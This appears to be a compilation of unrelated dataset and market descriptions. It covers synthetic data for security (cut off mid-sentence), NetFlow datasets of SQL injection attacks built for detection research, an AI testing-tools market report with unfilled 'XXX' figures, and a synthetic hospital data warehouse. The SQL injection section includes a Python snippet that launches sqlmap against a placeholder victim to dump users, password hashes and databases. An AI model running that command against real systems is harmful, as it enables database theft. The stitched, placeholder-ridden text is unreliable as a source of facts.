Another significant driver for the market is the growing complexity of regulatory landscapes governing data privacy and protection. Enterprises, especially those operating in highly regulated sectors like banking, financial services, insurance (BFSI), and healthcare, face mounting pressure to safeguard customer data while maintaining operational agility. Synthetic data offers a compelling solution by enabling organizations to generate realistic yet anonymized datasets that can be used for security analytics, fraud detection, and identity management. This approach minimizes the risk of data leakage and supports continuous innovation in security technologies. Moreover, advancements in AI and ML algorithms for synthetic data generation have further improved the quality and utility of these datasets, making them increasingly indispensable for modern security operations.
The rapid adoption of cloud computing and the shift towards remote and hybrid work environments have also contributed to the surge in demand for synthetic data solutions in security. As enterprises migrate their workloads to cloud-based platforms, the attack surface expands, necessitating more sophisticated and scalable security measures. Synthetic data enables organizations to conduct comprehensive security testing and vulnerability assessments in dynamic cloud environments without compromising real user data. Additionally, the integration of synthetic data into security operations centers (SOCs) and threat intelligence platforms empowers security analysts to proactively identify and mitigate emerging risks. This trend is particularly pronounced in sectors such as IT and telecommunications, where the pace of digital innovation demands agile and resilient security frameworks.
As the synthetic data for security market continues to evolve, organizations are increasingly recognizing the importance of Synthetic Data Liability Insurance. This type of insurance is becoming crucial for companies that generate and utilize synthetic data, as it provides coverage against potential liabilities arising from data breaches, misuse, or inaccuracies in synthetic datasets. By securing liability insurance, businesses can mitigate financial risks and demonstrate their commitment to responsible data practices. This is particularly important in industries where data integrity and compliance are paramount, such as healthcare and finance. As the adoption of synthetic data grows, so does the need for comprehensive insurance solutions that address the unique challenges and risks associated with this innovative technology.
From a regional perspective, North America continues
Introduction

These datasets contain SQL injection attacks (SQLIA) as malicious NetFlow data. The attacks carried out are SQL injection for Union Query and Blind SQL injection. To perform the attacks, the SQLMAP tool has been used. NetFlow traffic was generated using DOROTHEA (DOcker-based fRamework fOr gaTHering nEtflow trAffic). NetFlow is a network protocol developed by Cisco for the collection and monitoring of network traffic flow data. A flow is defined as a unidirectional sequence of packets with some common properties that pass through a network device.

Datasets

The first dataset was collected to train the detection models (D1), and the other was collected using different attacks than those used in training, to test the models and ensure their generalization (D2). The datasets contain both benign and malicious traffic. All collected datasets are balanced. The version of NetFlow used to build the datasets is 5.

| Dataset | Aim | Samples | Benign-malicious traffic ratio |
| --- | --- | --- | --- |
| D1 | Training | 400,003 | 50% |
| D2 | Test | 57,239 | 50% |

Infrastructure and implementation

Two sets of flow data were collected with DOROTHEA. DOROTHEA is a Docker-based framework for NetFlow data collection. It allows you to build interconnected virtual networks to generate and collect flow data using the NetFlow protocol. In DOROTHEA, network traffic packets are sent to a NetFlow generator that has the sensor ipt_netflow installed. The sensor consists of a module for the Linux kernel using Iptables, which processes the packets and converts them to NetFlow flows. DOROTHEA is configured to use NetFlow v5 and to export a flow after it has been inactive for 15 seconds or active for 1,800 seconds (30 minutes).

Benign traffic generation nodes simulate network traffic generated by real users, performing tasks such as searching in web browsers, sending emails, or establishing Secure Shell (SSH) connections. Such tasks run as Python scripts. Users may customize them or even incorporate their own. The network traffic is managed by a gateway that performs two main tasks. On the one hand, it routes packets to the Internet. On the other hand, it sends them to a NetFlow data generation node (this process is carried out similarly for packets received from the Internet).

The malicious traffic (SQLIA) was generated using SQLMAP, a penetration testing tool used to automate the process of detecting and exploiting SQL injection vulnerabilities. The attacks were executed on 16 nodes, each launching SQLMAP with the parameters in the following table.

| Parameters | Description |
| --- | --- |
| '--banner', '--current-user', '--current-db', '--hostname', '--is-dba', '--users', '--passwords', '--privileges', '--roles', '--dbs', '--tables', '--columns', '--schema', '--count', '--dump', '--comments' | Enumerate users, password hashes, privileges, roles, databases, tables and columns |
| --level=5 | Increase the probability of a false positive identification |
| --risk=3 | Increase the probability of extracting data |
| --random-agent | Select the User-Agent randomly |
| --batch | Never ask for user input, use the default behavior |
| --answers="follow=Y" | Predefined answers to yes |

Every node executed SQLIA on 200 victim nodes. The victim nodes had deployed a web form vulnerable to Union-type injection attacks, which was connected to the MySQL or SQLServer database engines (50% of the victim nodes deployed MySQL and the other 50% deployed SQLServer). The web service was accessible from ports 443 and 80, which are the ports typically used to deploy web services. The IP address space was 182.168.1.1/24 for the benign and malicious traffic-generating nodes. For victim nodes, the address space was 126.52.30.0/24.

The malicious traffic in the two datasets was collected under different conditions. For D1, SQLIA were performed using Union attacks on the MySQL and SQLServer databases. For D2, Blind SQL injection attacks were performed against the web form connected to a PostgreSQL database. The IP address spaces of the networks were also different from those of D1: in D2, the IP address space was 152.148.48.1/24 for benign and malicious traffic-generating nodes and 140.30.20.1/24 for victim nodes. To run the MySQL server we used MariaDB version 10.4.12; Microsoft SQL Server 2017 Express and PostgreSQL version 13 were also used.
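For illustration, the SQLMAP invocation implied by the parameter table above could be assembled as follows. The enumeration flags are copied from the table; the target URL and the use of subprocess are hypothetical:

```python
# Assemble and launch the SQLMAP attack command described above.
import subprocess

enumeration_flags = [
    "--banner", "--current-user", "--current-db", "--hostname", "--is-dba",
    "--users", "--passwords", "--privileges", "--roles", "--dbs", "--tables",
    "--columns", "--schema", "--count", "--dump", "--comments",
]
cmd = [
    "sqlmap",
    "-u", "http://victim.example/form.php?id=1",  # hypothetical vulnerable endpoint
    *enumeration_flags,
    "--level=5",            # increase detection thoroughness
    "--risk=3",             # allow riskier, data-extracting payloads
    "--random-agent",       # randomize the User-Agent header
    "--batch",              # never prompt; use default answers
    "--answers=follow=Y",   # predefine the redirect-follow answer
]
subprocess.run(cmd)  # launched on each of the 16 attacking nodes
```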
https://www.archivemarketresearch.com/privacy-policy
Market Analysis for AI-Powered Testing Tools

The global AI-powered testing tools market is projected to reach a value of USD XXX million by 2033, exhibiting a remarkable CAGR of XX% during the forecast period (2025-2033). The increasing adoption of agile software development methodologies, growing demand for continuous testing and quality assurance, and advancements in artificial intelligence and machine learning are the key factors driving market growth. Major players in the industry include Perforce Software, Applitools, Functionize, Testim, mabl, Parasoft, Autify, SeaLights, ReportPortal, ACCELQ, Testsigma, and Keysight. The market is segmented based on type (SaaS, PaaS, Other) and application (Large Enterprises, Small and Middle Enterprises). North America is the largest regional market, followed by Europe and Asia Pacific. The growing adoption of cloud-based testing solutions, increasing investment in automation, and the need for efficient and comprehensive testing solutions are further fueling market expansion. Restraints include the lack of skilled professionals, concerns regarding data security, and the high cost of implementation. However, advancements in AI and ML techniques, such as natural language processing and image recognition, are expected to create new growth opportunities in the AI-powered testing tools market.

AI-Powered Testing Tool Concentration & Characteristics

This market is highly concentrated, with a handful of large players holding a majority of the revenue. Key characteristics of innovation include the integration of AI and ML capabilities, automated test generation and scripting, and self-healing capabilities. Regulatory bodies are imposing stricter data privacy and security standards, impacting the adoption of AI-powered testing tools. Product substitutes exist in the form of traditional manual testing, which presents a challenge to market growth. End-user concentration is primarily centered around large enterprises with complex and diverse software portfolios. The M&A landscape is relatively active, with several acquisitions and collaborations taking place to strengthen product offerings.
Database Contents License (DbCL) v1.0: http://opendatacommons.org/licenses/dbcl/1.0/
MedSynora DW – A Comprehensive Synthetic Hospital Patient Data Warehouse
Overview

MedSynora DW is a large synthetic dataset designed to simulate the operational flow of a big hospital using a patient-centered approach. The dataset covers patient encounters, treatments, lab tests, vital signs, cost details, and more over the full year of 2024. It was developed to support data science, machine learning, and business intelligence projects in the healthcare domain.
Project Highlights
- Realistic Simulation: Generated using advanced Python scripts and statistical models, the dataset reflects realistic hospital operations and patient flows without using any real patient data.
- Comprehensive Schema: The data warehouse includes multiple fact and dimension tables:
  - Fact Tables: Encounter, Treatment, Lab Tests, Special Tests, Vitals, and Cost.
  - Dimension Tables: Patient, Doctor, Disease, Insurance, Room, Date, Chronic Diseases, Allergies, and Additional Services.
  - Bridge Tables: for managing many-to-many relationships (e.g., doctors per encounter), among others.
- Synthetic & Scalable: The dataset is entirely synthetic, ensuring privacy and compliance. It is designed to be scalable; the current version simulates around 145,000 encounter records.
Data Generation
- Data Sources & Methods: The data is generated using a collection of Python libraries. Highly customized algorithms simulate realistic patient demographics, doctor assignments, treatment choices, lab test results, cost breakdowns, and more.
- Diverse Scenarios: With over 300 diseases and thousands of treatment variations, along with dozens of lab and special tests, the dataset offers rich variability to support complex analytical projects.
How to Use This Dataset
- For Data Modeling & ETL Testing: Import the CSV files into your favorite database system (e.g., PostgreSQL or MySQL) or directly into a BI tool like Power BI, and set up relationships as described in the accompanying documentation (a minimal loading sketch follows this list).
- For Machine Learning Projects: Use the dataset to build predictive models related to patient outcomes, cost analysis, or treatment efficacy.
- For Educational Purposes: Ideal for learning about data warehousing, star schema design, and advanced analytics in healthcare.
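As referenced in the first item above, here is a minimal pandas sketch for the data-modeling use case. The CSV file names and the join key are assumptions; consult the accompanying documentation for the real schema:

```python
# Load a fact and a dimension table, then join them star-schema style.
import pandas as pd

encounters = pd.read_csv("FactEncounter.csv")  # hypothetical file name
patients = pd.read_csv("DimPatient.csv")       # hypothetical file name

# Enrich fact rows with patient attributes via the assumed surrogate key.
enriched = encounters.merge(patients, on="PatientID", how="left")
print(enriched.head())
```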
Final Note

MedSynora DW offers a unique opportunity to experiment with a comprehensive, realistic hospital data warehouse without compromising real patient information. Enjoy exploring, analyzing, and building with this dataset, and feel free to reach out with questions or suggestions. In particular, reports from domain experts about inconsistencies or deficiencies will help improve future versions.